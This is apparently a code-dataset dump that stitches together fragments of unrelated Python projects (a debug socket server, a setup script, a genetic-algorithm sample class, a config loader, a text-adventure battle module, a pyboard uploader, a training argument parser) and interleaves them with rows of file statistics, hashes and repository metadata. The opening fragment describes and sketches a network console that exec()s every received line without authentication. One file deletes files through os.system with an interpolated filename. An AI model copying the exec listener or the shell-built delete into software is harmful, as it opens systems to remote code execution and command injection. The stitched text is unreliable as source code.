conn = Debug_connection(self, connection, client_address)
self._connections.append(conn)
def loop_stopped(self):
if self._socket:
self._socket.close()
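# Hedged usage note: connect with e.g. `telnet <host> 7212`; each line typed is
# exec'd as Python with `root` bound in scope, and typing `exit` closes the
# session.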
# import socket
# import sys
# def main():
# host = ""
# port = 50000
# backlog = 5
# size = 1024
# sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# sock.bind((host, port))
# sock.listen(backlog)
# while True:
# client, address = sock.accept()
# test.log("Client connected.")
# while True:
# data = client.recv(size).rstrip()
# if not data:
# continue
# test.log("Received command: %s" % data)
# if data == "disconnect":
# test.log("Client disconnected.")
# client.send(data)
# client.close()
# break
# if data == "exit":
# test.log("Client asked server to quit")
# client.send(data)
# client.close()
# return
# test.log("Executing command: %s" % data)
# try:
# exec(data)
# except Exception, err:
# test.log("Error occured while executing command: %s" % (
# data), str(err))
| 30.62406
| 94
| 0.499386
| 410
| 4,073
| 4.773171
| 0.282927
| 0.050077
| 0.035258
| 0.01533
| 0.099131
| 0.053143
| 0.053143
| 0.053143
| 0.053143
| 0.053143
| 0
| 0.008554
| 0.39725
| 4,073
| 133
| 95
| 30.62406
| 0.788595
| 0.273508
| 0
| 0.292683
| 0
| 0
| 0.027027
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097561
| false
| 0.036585
| 0.085366
| 0
| 0.219512
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afc0461dd64d75f8650665858aa646a390a84868
| 972
|
py
|
Python
|
setup.py
|
AGOberprieler/allcopol
|
7fd3d8ad7c9ff8410155691d8a37fdbea7783c81
|
[
"MIT"
] | 1
|
2020-10-19T08:22:50.000Z
|
2020-10-19T08:22:50.000Z
|
setup.py
|
AGOberprieler/allcopol
|
7fd3d8ad7c9ff8410155691d8a37fdbea7783c81
|
[
"MIT"
] | null | null | null |
setup.py
|
AGOberprieler/allcopol
|
7fd3d8ad7c9ff8410155691d8a37fdbea7783c81
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
with open("README.md", "r") as f:
long_description = f.read()
setup(name = "allcopol",
version = "0.1.1",
description = "AllCoPol: Inferring allele co-ancestry in polyploids",
long_description = long_description,
long_description_content_type = "text/markdown",
url = "https://github.com/AGOberprieler/allcopol",
author = "Ulrich Lautenschlager",
author_email = "ulrich.lautenschlager@ur.de",
license = "MIT",
packages = find_packages(),
install_requires = [
"argparse", "biopython", "configargparse", "numpy", "scipy"
],
entry_points = {
"console_scripts": [
"allcopol=allcopol.allcopol:main",
"align_clusters=allcopol.align_clusters:main",
"create_indfile=allcopol.create_indfile:main",
"relabel_trees=allcopol.relabel_trees:main",
],
},
zip_safe = False,
python_requires = ">=3.5",
)
| 30.375
| 73
| 0.644033
| 102
| 972
| 5.941176
| 0.666667
| 0.09901
| 0.062706
| 0.09901
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006623
| 0.223251
| 972
| 31
| 74
| 31.354839
| 0.796026
| 0
| 0
| 0.074074
| 0
| 0
| 0.410917
| 0.190525
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.037037
| 0
| 0.037037
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afc04d85e4ad399b752a6a1b506501312782c229
| 2,686
|
py
|
Python
|
genalg/sample.py
|
davidkant/thresholds-ga
|
78988bb1bfa1c1eb32afc24edf59e5fde2f1c212
|
[
"Apache-2.0"
] | null | null | null |
genalg/sample.py
|
davidkant/thresholds-ga
|
78988bb1bfa1c1eb32afc24edf59e5fde2f1c212
|
[
"Apache-2.0"
] | 9
|
2018-05-06T18:55:29.000Z
|
2018-05-06T19:13:33.000Z
|
genalg/sample.py
|
davidkant/thresholds-ga
|
78988bb1bfa1c1eb32afc24edf59e5fde2f1c212
|
[
"Apache-2.0"
] | null | null | null |
import spec
import sonicfeatures
import display
import random
import os
class Sample:
"""Keep track of samples and their stuff."""
def __init__(self, genotype, gen=0, index=0, parents=None, fitness_func=None):
self.genotype = genotype
        self.phenotype = None
self.fitness_func = fitness_func
self.gen = gen
self.index = index
self.parents = parents
self.mutant = False
self.score = None
self.rid = None
@classmethod
def random_sample(cls, index, randorams, spec, fitness_func=None):
"""A random Sample."""
# return cls([spec.map_spec(param, random.random()) for i in range(4) for param in randorams], index)
random_sample = cls([spec.map_spec(param, random.random()) for i in range(4) for param in randorams],
gen=0,
index=index,
parents=None,
fitness_func=fitness_func)
random_sample.phenotype = random_sample.to_phenotype(randorams, spec)
return random_sample
def to_phenotype(self, randorams, spec):
"""Map genotype [0,1] to through param spec."""
return [spec.map_spec(param, gene) for gene,param in zip(self.genotype, randorams)]
def render(self, renderer, filename='sample', verbose=True):
"""Ask rs server to render me."""
renderer.render(self, filename=filename, verbose=verbose)
return self
def render_and_do(self, renderer, do_func, func_args, filename='sample', verbose=True):
"""Render and do do_func upon completion."""
renderer.render_and_do(self, do_func, func_args, filename, verbose)
return self
def render_and_score(self, renderer, filename='sample', verbose=True):
"""Render and score fitness."""
renderer.render_and_score(self, filename, verbose)
return self
def fitness(self, renderer, deleteme=True):
"""Evalute fitness. Assume we are rendered."""
# print('{0}evaluating fitness: {1}'.format(NW_THRD, self.rid))
filename = '{0}/{1}.wav'.format(renderer.render_params['foldername'], self.filename)
fitness = self.fitness_func(filename)
print('{0}done evaluating fitness: {1}, index: {3} = {2}'.format(display.NOTIFY, self.rid, fitness, self.index))
# delete file for space
if deleteme: os.system('rm "{0}"'.format(filename))
# do this last cuz triggers stuff
self.score = fitness
return self
def __repr__(self):
return '<Sample(gen: {0.gen!r}, index: {0.index!r}, rid: {0.rid!r}, score: {0.score!r})>'.format(self)
| 40.089552
| 120
| 0.624348
| 342
| 2,686
| 4.78655
| 0.269006
| 0.047037
| 0.031765
| 0.029322
| 0.221747
| 0.182651
| 0.075748
| 0.075748
| 0.075748
| 0.075748
| 0
| 0.009995
| 0.255026
| 2,686
| 66
| 121
| 40.69697
| 0.808096
| 0.167163
| 0
| 0.088889
| 0
| 0.022222
| 0.080073
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.177778
| false
| 0
| 0.111111
| 0.022222
| 0.466667
| 0.022222
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afc24baeb3d33abb5be32b2647fa2afb09362e83
| 1,945
|
py
|
Python
|
youtube_rss_subscriber/config.py
|
miquelruiz/youtube-rss-subscriber
|
0dbdb011faf910be7dfd4757cd7295b898d4297c
|
[
"WTFPL"
] | 3
|
2021-03-21T07:43:12.000Z
|
2021-07-23T11:07:55.000Z
|
youtube_rss_subscriber/config.py
|
miquelruiz/youtube-rss-subscriber
|
0dbdb011faf910be7dfd4757cd7295b898d4297c
|
[
"WTFPL"
] | null | null | null |
youtube_rss_subscriber/config.py
|
miquelruiz/youtube-rss-subscriber
|
0dbdb011faf910be7dfd4757cd7295b898d4297c
|
[
"WTFPL"
] | 2
|
2021-04-11T13:26:29.000Z
|
2021-07-25T18:03:34.000Z
|
from typing import Any, Dict, List, Optional, cast
from pathlib import Path
import yaml
CONFIG_FILE_NAME = "config.yml"
CONFIG_DIRS = (
Path.home() / Path(".yrs"),
Path("/etc/youtube-rss-subscriber"),
)
class Config:
_instance: Optional["Config"] = None
_config: Dict[str, Any]
_required_keys: List[str] = ["database_url"]
def __new__(cls) -> "Config":
if cls._instance is None:
cls._instance = super(Config, cls).__new__(cls)
config_file_path = None
for c in CONFIG_DIRS:
file_path = c / Path(CONFIG_FILE_NAME)
if c.is_dir() and file_path.is_file():
config_file_path = file_path
if config_file_path is None:
config_file_path = init()
with open(config_file_path, "r") as cfile:
cls._config = cast(Dict[str, Any], yaml.safe_load(cfile))
for k in cls._required_keys:
try:
cls._config[k]
except KeyError:
raise RuntimeError(f"Invalid configuration: '{k}' missing")
return cls._instance
@property
def database_url(self) -> str:
return cast(str, self._config["database_url"])
@property
def youtube_dl_opts(self) -> Dict[str, Any]:
return cast(Dict[str, Any], self._config["youtube_dl_opts"])
def init() -> Path:
config_dir = CONFIG_DIRS[0]
config_dir.mkdir(exist_ok=True)
config_file_path = config_dir / Path(CONFIG_FILE_NAME)
with open(config_file_path, "w") as cfile:
yaml.dump(
{
"database_url": f"sqlite:///{config_dir}/yrs.db",
"youtube_dl_opts": {
"outtmpl": "%(title)s-%(id)s.%(ext)s",
},
},
stream=cfile,
)
print(f"Config file created in {config_file_path}")
return config_file_path
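# The config.yml written by init() looks like (the database path depends on
# the chosen config_dir):
#
#   database_url: sqlite:///<config_dir>/yrs.db
#   youtube_dl_opts:
#     outtmpl: '%(title)s-%(id)s.%(ext)s'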
| 28.602941
| 79
| 0.568123
| 240
| 1,945
| 4.316667
| 0.3375
| 0.125483
| 0.121622
| 0.034749
| 0.042471
| 0
| 0
| 0
| 0
| 0
| 0
| 0.000752
| 0.316195
| 1,945
| 67
| 80
| 29.029851
| 0.778195
| 0
| 0
| 0.038462
| 0
| 0
| 0.132648
| 0.041131
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.057692
| 0.038462
| 0.288462
| 0.019231
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afcab14f17dffbf6475626aeb921c67d6e9af7bc
| 4,494
|
py
|
Python
|
Assets/ExpressiveRangeAnalyses/example_generator.py
|
rafaeldolfe/Mixed-initiative-Tile-based-Designer
|
9001f0e1b68ec8c9fa49d876d2cc6ec1426d1d01
|
[
"MIT"
] | null | null | null |
Assets/ExpressiveRangeAnalyses/example_generator.py
|
rafaeldolfe/Mixed-initiative-Tile-based-Designer
|
9001f0e1b68ec8c9fa49d876d2cc6ec1426d1d01
|
[
"MIT"
] | null | null | null |
Assets/ExpressiveRangeAnalyses/example_generator.py
|
rafaeldolfe/Mixed-initiative-Tile-based-Designer
|
9001f0e1b68ec8c9fa49d876d2cc6ec1426d1d01
|
[
"MIT"
] | null | null | null |
import random
import numpy as np
class Run:
def __init__(self, run_name, linearities, leniencies, ids):
self.run_name = run_name
self.linearities = linearities
self.leniencies = leniencies
self.ids = ids
self.sample_size = len(linearities)
self.PerformCalculations()
def PerformCalculations(self):
self.min_leniency = min(self.leniencies)
self.max_leniency = max(self.leniencies)
self.normalized_leniencies = list(map(lambda x: self.normalize(x, self.min_leniency, self.max_leniency), self.leniencies))
self.min_linearity = min(self.linearities)
self.max_linearity = max(self.linearities)
self.normalized_linearities = list(map(lambda x: self.normalize(x, self.min_linearity, self.max_linearity), self.linearities))
self.average_linearity = sum(self.linearities)/len(self.linearities)
self.average_leniency = sum(self.leniencies)/len(self.leniencies)
self.average_point = (self.average_linearity, self.average_leniency)
self.normalized_average_point = (self.normalize(self.average_linearity, self.min_linearity, self.max_linearity), self.normalize(self.average_leniency, self.min_leniency, self.max_leniency))
self.std_linearity = np.std(self.linearities)
self.std_leniency = np.std(self.leniencies)
    def normalize(self, x, lower, upper):
        return (x - lower) / (upper - lower)
def __str__(self):
return f'<name: {self.run_name}, sample_size: {len(self.ids)}, average linearity: {round(self.average_linearity, 2)}, average leniency: {round(self.average_leniency, 2)}>'
def __repr__(self):
return str(self)
def print_random_samples_of_maps(run, num):
random_sample = random.sample(run.ids, num)
for sample in random_sample:
print((sample, run.normalized_linearities[sample], run.normalized_leniencies[sample], run.linearities[sample], run.leniencies[sample]))
def find_same_normalized_data_point(id_list1, id_list2, normalized_linearity, normalized_leniency, linearity_weight):
firstLevel = min(id_list1, key=lambda entry:abs(entry[1]-normalized_linearity)*linearity_weight+abs(entry[2]-normalized_leniency))
secondLevel = min(id_list2, key=lambda entry:abs(entry[1]-normalized_linearity)*linearity_weight+abs(entry[2]-normalized_leniency))
return (firstLevel, secondLevel)
filename = 'example_generator_config.txt'
run_names = []
number_of_maps_to_randomly_sample = 0
with open(filename) as f:
name_of_everything = f.readline().rstrip('\n')
number_of_maps_to_randomly_sample = int(f.readline())
run_name = f.readline()
while run_name != "":
run_names.append(run_name.rstrip('\n'))
run_name = f.readline()
print(run_names)
number_of_runs = len(run_names)
runs = []
for i in range(len(run_names)):
run_name = run_names[i]
run_file_name = f'{run_name}/data.txt'
with open(run_file_name) as f:
display_name = f.readline()
ids = []
leniencies = []
linearities = []
id = f.readline()
while id != "":
ids.append(int(id))
leniency = f.readline().rstrip('\n').replace(',',".")
leniencies.append(float(leniency))
linearity = f.readline().rstrip('\n').replace(',',".")
linearities.append(float(linearity))
id = f.readline()
runs.append(Run(display_name, linearities, leniencies, ids))
normalized_id_lists = []
for run in runs:
normalized_id_lists.append(list(zip(run.ids, run.normalized_linearities, run.normalized_leniencies, run.linearities, run.leniencies)))
print_random_samples_of_maps(runs[0], number_of_maps_to_randomly_sample)
print("Enter normalized linearity")
normalized_linearity = float(input())
print("Enter normalized leniency")
normalized_leniency = float(input())
print("How weighted should linearity be?")
linearity_weight = float(input())
print("Which runs to get it from")
print("Run nmbr 1")
run_number_1 = int(input())
print("Run nmbr 2")
run_number_2 = int(input())
id_list1 = normalized_id_lists[run_number_1]
id_list2 = normalized_id_lists[run_number_2]
print(find_same_normalized_data_point(id_list1, id_list2, normalized_linearity, normalized_leniency, linearity_weight))
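A self-contained sketch of the weighted L1 nearest-point selection that find_same_normalized_data_point performs, on made-up entries of the form (id, norm_linearity, norm_leniency, linearity, leniency):
entries = [
    (0, 0.10, 0.90, 3.0, 7.0),
    (1, 0.50, 0.50, 5.0, 5.0),
    (2, 0.80, 0.20, 8.0, 2.0),
]
target_lin, target_len, weight = 0.6, 0.4, 2.0
best = min(entries, key=lambda e: abs(e[1] - target_lin) * weight
                                  + abs(e[2] - target_len))
print(best)  # (1, 0.5, 0.5, 5.0, 5.0): distance 0.3 beats 1.5 and 0.6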
| 36.536585
| 198
| 0.715398
| 593
| 4,494
| 5.175379
| 0.187184
| 0.022809
| 0.030955
| 0.013685
| 0.254154
| 0.206582
| 0.179211
| 0.138156
| 0.138156
| 0.115347
| 0
| 0.005887
| 0.168447
| 4,494
| 122
| 199
| 36.836066
| 0.81536
| 0
| 0
| 0.043478
| 0
| 0.01087
| 0.077694
| 0.019368
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076087
| false
| 0
| 0.097826
| 0.032609
| 0.228261
| 0.119565
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afcbed072ad157da39a96ed8b309d2b6f0eb45c5
| 781
|
py
|
Python
|
tests/test_utils.py
|
cdyfng/pyetheroll
|
84149f328a1dc6db47834d02ade50e21286f3409
|
[
"MIT"
] | 1
|
2018-11-01T02:58:35.000Z
|
2018-11-01T02:58:35.000Z
|
tests/test_utils.py
|
cdyfng/pyetheroll
|
84149f328a1dc6db47834d02ade50e21286f3409
|
[
"MIT"
] | 13
|
2019-03-13T13:21:42.000Z
|
2020-05-27T21:55:40.000Z
|
tests/test_utils.py
|
cdyfng/pyetheroll
|
84149f328a1dc6db47834d02ade50e21286f3409
|
[
"MIT"
] | 2
|
2019-08-01T07:01:31.000Z
|
2021-12-20T05:09:02.000Z
|
from datetime import datetime
from pyetheroll.utils import EtherollUtils, timestamp2datetime
class TestEtherollUtils:
def test_compute_profit(self):
bet_size = 0.10
chances_win = 34
payout = EtherollUtils.compute_profit(bet_size, chances_win)
assert payout == 0.19
bet_size = 0.10
# chances of winning must be less than 100%
chances_win = 100
payout = EtherollUtils.compute_profit(bet_size, chances_win)
assert payout is None
class TestUtils:
def test_timestamp2datetime(self):
assert timestamp2datetime("1566645978") == (
datetime(2019, 8, 24, 11, 26, 18)
)
assert timestamp2datetime("0x5d611eda") == (
datetime(2019, 8, 24, 11, 26, 18)
)
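Why both assertions expect the same datetime: the hex input is the same Unix timestamp, just base-16 encoded, which timestamp2datetime evidently normalizes before conversion:
assert int("0x5d611eda", 16) == 1566645978  # same instant, two encodings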
| 28.925926
| 68
| 0.644046
| 89
| 781
| 5.505618
| 0.47191
| 0.057143
| 0.032653
| 0.040816
| 0.404082
| 0.334694
| 0.334694
| 0.24898
| 0.24898
| 0.24898
| 0
| 0.109929
| 0.277849
| 781
| 26
| 69
| 30.038462
| 0.758865
| 0.052497
| 0
| 0.3
| 0
| 0
| 0.0271
| 0
| 0
| 0
| 0.01355
| 0
| 0.2
| 1
| 0.1
| false
| 0
| 0.1
| 0
| 0.3
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afceefa6ab42fdff336bb5e178d3b569a6751ee3
| 7,156
|
py
|
Python
|
adventxtend.py
|
Textovortex/AdventXtend
|
0818804daecb570c98b6d7793a99223d2f14665b
|
[
"MIT"
] | 1
|
2021-04-16T12:04:56.000Z
|
2021-04-16T12:04:56.000Z
|
adventxtend.py
|
leha-code/adventXtend
|
0818804daecb570c98b6d7793a99223d2f14665b
|
[
"MIT"
] | 2
|
2021-04-16T16:16:47.000Z
|
2021-04-18T01:19:06.000Z
|
adventxtend.py
|
leha-code/adventXtend
|
0818804daecb570c98b6d7793a99223d2f14665b
|
[
"MIT"
] | null | null | null |
'''
________ ________ ___ ___ _______ ________ _________ ___ ___ _________ _______ ________ ________
|\ __ \|\ ___ \|\ \ / /|\ ___ \ |\ ___ \|\___ ___\|\ \ / /|\___ ___\\ ___ \ |\ ___ \|\ ___ \
\ \ \|\ \ \ \_|\ \ \ \ / / | \ __/|\ \ \\ \ \|___ \ \_|\ \ \/ / ||___ \ \_\ \ __/|\ \ \\ \ \ \ \_|\ \
\ \ __ \ \ \ \\ \ \ \/ / / \ \ \_|/_\ \ \\ \ \ \ \ \ \ \ / / \ \ \ \ \ \_|/_\ \ \\ \ \ \ \ \\ \
\ \ \ \ \ \ \_\\ \ \ / / \ \ \_|\ \ \ \\ \ \ \ \ \ / \/ \ \ \ \ \ \_|\ \ \ \\ \ \ \ \_\\ \
\ \__\ \__\ \_______\ \__/ / \ \_______\ \__\\ \__\ \ \__\/ /\ \ \ \__\ \ \_______\ \__\\ \__\ \_______\
\|__|\|__|\|_______|\|__|/ \|_______|\|__| \|__| \|__/__/ /\ __\ \|__| \|_______|\|__| \|__|\|_______|
|__|/ \|__|
By | |_|_| /\_|_._ _ o.__|_ _
|_|_| |/--\|_|_||_)(_)|| ||_(_)\/\/
_/ _/ _/ _/ _/ _/ _/_/_/ _/_/_/_/_/
_/ _/_/_/ _/_/ _/_/_/ _/_/_/ _/_/ _/_/_/ _/ _/ _/_/_/ _/_/_/ _/_/ _/ _/_/ _/_/ _/_/ _/ _/
_/ _/ _/ _/_/_/_/ _/ _/ _/_/ _/_/_/_/ _/ _/ _/ _/ _/ _/ _/ _/ _/_/_/_/ _/_/ _/ _/ _/ _/ _/
_/ _/ _/ _/ _/ _/ _/_/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/
_/ _/ _/_/_/ _/_/_/ _/ _/ _/_/_/ _/_/_/ _/_/_/ _/_/_/ _/ _/ _/_/_/ _/_/_/ _/ _/ _/ _/_/_/ _/
'''
try:
    from adventurelib import Item, say, Bag  # primary dependency
except ImportError:  # fall back to the bundled variant
    from adstrangerlib import Item, say, Bag
from random import choice, randint
import copy
import time
__version__ = "0.0.3"
class Character(Item):
'''
The character.'''
def __init__(self, name, desc, hp, dp, powers=None, exp=None):
'''
The character. Do NOT use the variable "character"'''
self.name = name
self.desc = desc
self.hp = hp
self.dp = dp
self.powers = powers
self.exp = exp
self.list = Bag()
class Player(Character):
'''
The player class extends the character.
'''
def __init__(self, name, hp, dp_range, powers=None, exp=None, lvl=None):
self.name = name
self.hp = hp
self.dp = dp_range
self.powers = powers
self.exp = exp
self.lvl = lvl
class Battle():
def __init__(self, lose_msg, win_msg, character_, player_, reset_func,
death_msg="You Died.",
vict_msg="You Won!",
prompt ="Enter a power >",
unknown_power="Choose a valid power"):
'''
lose_msg = messages when the player loses; is a list
win_msg = when the player wins; is a list
character_ = the character the player battles; is a Character object
player_ = the player variable; is a Player object
reset_func = function to reset your game if the player loses the battle.; is a function
'''
self.lose_msg = lose_msg
self.win_msg = win_msg
self.character = character_
        self.character_save = copy.deepcopy(character_)  # independent copy, so hp can actually be restored after the battle
self.player = player_
self.reset_func = reset_func
self.death_msg = death_msg
self.vict_msg = vict_msg
self.prompt = prompt
self.unk_power = unknown_power
    def start(self):
        '''
        Starts the battle
        '''
self.finished = False # the battle is not finished
while not self.finished:
if self.player.hp <= 0:
say(self.death_msg) # RIP you
self.reset_func() # run the reset function, as it is going to
self.finished = True
self.character.hp = self.character_save.hp
break
elif self.character.hp <= 0: # Oh, yay, now do I have to beat that troll over there?
say(self.vict_msg)
self.finished = True
self.character.hp = self.character_save.hp
break
say(f"You have {self.player.hp} \u2665")
time.sleep(0.5)
#message = choice(choice([self.win_msg, self.lose_msg])) # generate a random message
say(f"You are fighting the {self.character.name}") # yes, I do need to know when I am fighting the
#response = input(f"\u2665 {self.player.hp}\nChoose a power > ")
#if response in self.player.powers:
# say(f'You {response} the {self.character.name}')
# self.character.hp -= self.player.dp
# say(f"The {self.character.name} has now {self.character.hp} health points")
# say(message)
# if message in self.win_msg:
# self.player.hp += self.character.dp
# self.player.hp -= self.character.dp
# say(f"The {self.character.name} fights you back and you lose {self.character.dp} HP")
#else:
# say("Choose a valid power") # yeah, do you really expect me?
self.fighter = choice([self.player, self.character])
time.sleep(0.5)
if self.fighter is self.player:
for power in self.player.powers:
say(f"You have the power to {power}")
time.sleep(0.3)
power = input(self.prompt)
if power in self.player.powers:
self.character.hp -= randint(self.player.dp[0],self.player.dp[1])
say(choice(self.win_msg))
else:
say(self.unk_power)
else:
self.player.hp -= self.character.dp
time.sleep(1)
say(choice(self.lose_msg))
time.sleep(1)
say(f"The {self.character.name} has {self.character.hp} \u2665")
| 50.394366
| 237
| 0.396311
| 560
| 7,156
| 4.242857
| 0.228571
| 0.114899
| 0.044192
| 0.042088
| 0.208333
| 0.196549
| 0.127104
| 0.046296
| 0.046296
| 0.046296
| 0
| 0.007242
| 0.479039
| 7,156
| 141
| 238
| 50.751773
| 0.630097
| 0.546115
| 0
| 0.27027
| 0
| 0
| 0.070381
| 0.013685
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054054
| false
| 0
| 0.054054
| 0
| 0.148649
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afcf06799a4c681aefacbbab3bd0c395c6f657a8
| 700
|
py
|
Python
|
led_panel_client/cli/commands.py
|
Glutexo/ledpanel-client
|
c23b5913f4a7727f0a878a4240187fb8c16be034
|
[
"MIT"
] | 1
|
2019-01-26T14:53:36.000Z
|
2019-01-26T14:53:36.000Z
|
led_panel_client/cli/commands.py
|
Glutexo/ledpanel-client
|
c23b5913f4a7727f0a878a4240187fb8c16be034
|
[
"MIT"
] | 3
|
2018-08-05T14:53:55.000Z
|
2019-01-27T11:15:45.000Z
|
led_panel_client/cli/commands.py
|
Glutexo/ledpanel-client
|
c23b5913f4a7727f0a878a4240187fb8c16be034
|
[
"MIT"
] | null | null | null |
from ampy.pyboard import Pyboard
from ampy.files import Files
from .files import led_panel_client, max7219
from os.path import basename
from sys import argv
def put():
"""
Uploads all necessary files to the pyboard.
"""
if len(argv) < 2:
print("Pyboard COM port not specified. Usage: led_panel_client_put /dev/tty.wchusbserial1410")
exit(1)
pyboard_pyboard = Pyboard(argv[1])
pyboard_files = Files(pyboard_pyboard)
files_to_put = led_panel_client() | max7219()
for file_path in files_to_put:
name = basename(file_path)
with open(file_path) as file_object:
data = file_object.read()
pyboard_files.put(name, data)
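A hedged sketch of invoking put() programmatically; the port path is the one from the module's own usage message and normally arrives via the console-script argv:
import sys
sys.argv = ["led_panel_client_put", "/dev/tty.wchusbserial1410"]
put()  # uploads the union of the led_panel_client() and max7219() file sets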
| 28
| 102
| 0.687143
| 99
| 700
| 4.656566
| 0.454545
| 0.052061
| 0.091106
| 0.091106
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027778
| 0.228571
| 700
| 24
| 103
| 29.166667
| 0.825926
| 0.061429
| 0
| 0
| 0
| 0
| 0.132605
| 0.039002
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.294118
| 0
| 0.352941
| 0.058824
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afcfa558f77ea2152e94c0d489367f3ae1bc234b
| 3,241
|
py
|
Python
|
koopman-intro/args.py
|
AbsoluteStratos/blog-code
|
3a8e308d55931b053b8a47268c52d62e0fa16bd8
|
[
"MIT"
] | 2
|
2021-07-30T10:04:18.000Z
|
2022-01-30T18:29:30.000Z
|
koopman-intro/args.py
|
AbsoluteStratos/blog-code
|
3a8e308d55931b053b8a47268c52d62e0fa16bd8
|
[
"MIT"
] | 1
|
2021-10-17T20:08:41.000Z
|
2021-10-17T20:08:41.000Z
|
koopman-intro/args.py
|
AbsoluteStratos/blog-code
|
3a8e308d55931b053b8a47268c52d62e0fa16bd8
|
[
"MIT"
] | 2
|
2021-07-30T10:04:20.000Z
|
2021-09-01T00:07:14.000Z
|
'''
Intro to deep learning Koopman operators
===
Author: Nicholas Geneva (MIT License)
url: https://nicholasgeneva.com/blog/
github: https://github.com/NickGeneva/blog-code
===
'''
import numpy as np
import random
import argparse
import os, errno, copy, json
import torch
class Parser(argparse.ArgumentParser):
def __init__(self):
super(Parser, self).__init__(description='Read')
self.add_argument('--exp-dir', type=str, default="./koopman", help='directory to save experiments')
self.add_argument('--exp-name', type=str, default="duffing", help='experiment name')
self.add_argument('--model', type=str, default="fcnn", choices=['fcnn'], help='experiment name')
# data
self.add_argument('--ntrain', type=int, default=200, help="number of training data")
        self.add_argument('--ntest', type=int, default=5, help="number of testing data")
self.add_argument('--stride', type=int, default=10, help="number of time-steps as encoder input")
self.add_argument('--batch-size', type=int, default=16, help='batch size for training')
# training
self.add_argument('--epoch-start', type=int, default=0, help='epoch to start at, will load pre-trained network')
self.add_argument('--epochs', type=int, default=300, help='number of epochs to train')
self.add_argument('--lr', type=float, default=0.001, help='ADAM learning rate')
self.add_argument('--seed', type=int, default=12345, help='manual seed used in PyTorch and Numpy')
# logging
self.add_argument('--plot-freq', type=int, default=25, help='how many epochs to wait before plotting test output')
self.add_argument('--test-freq', type=int, default=5, help='how many epochs to test the model')
self.add_argument('--ckpt-freq', type=int, default=5, help='how many epochs to wait before saving model')
self.add_argument('--notes', type=str, default='')
def mkdirs(self, *directories):
'''
Makes a directory if it does not exist
'''
for directory in list(directories):
try:
os.makedirs(directory)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def parse(self, dirs=True):
'''
        Parse program arguments
Args:
dirs (boolean): True to make file directories for predictions and models
'''
args = self.parse_args()
args.run_dir = args.exp_dir + '/' + '{}'.format(args.exp_name) \
+ '/{}_ntrain{}_batch{}_{}'.format(args.model, args.ntrain, args.batch_size, args.notes)
args.ckpt_dir = args.run_dir + '/checkpoints'
args.pred_dir = args.run_dir + "/predictions"
if(dirs):
self.mkdirs(args.run_dir, args.ckpt_dir, args.pred_dir)
# Set random seed
if args.seed is None:
args.seed = random.randint(1, 10000)
random.seed(args.seed)
torch.manual_seed(args.seed)
np.random.seed(seed=args.seed)
if dirs:
with open(args.run_dir + "/args.json", 'w') as args_file:
json.dump(vars(args), args_file, indent=4)
return args
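A small sketch of driving the Parser above without touching the filesystem (dirs=False skips mkdirs and the args.json dump); the argv values are illustrative:
import sys
sys.argv = ["train.py", "--exp-name", "duffing", "--ntrain", "200"]
args = Parser().parse(dirs=False)
print(args.run_dir)  # ./koopman/duffing/fcnn_ntrain200_batch16_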
| 41.551282
| 122
| 0.624499
| 428
| 3,241
| 4.630841
| 0.373832
| 0.052977
| 0.113522
| 0.028759
| 0.104945
| 0.097376
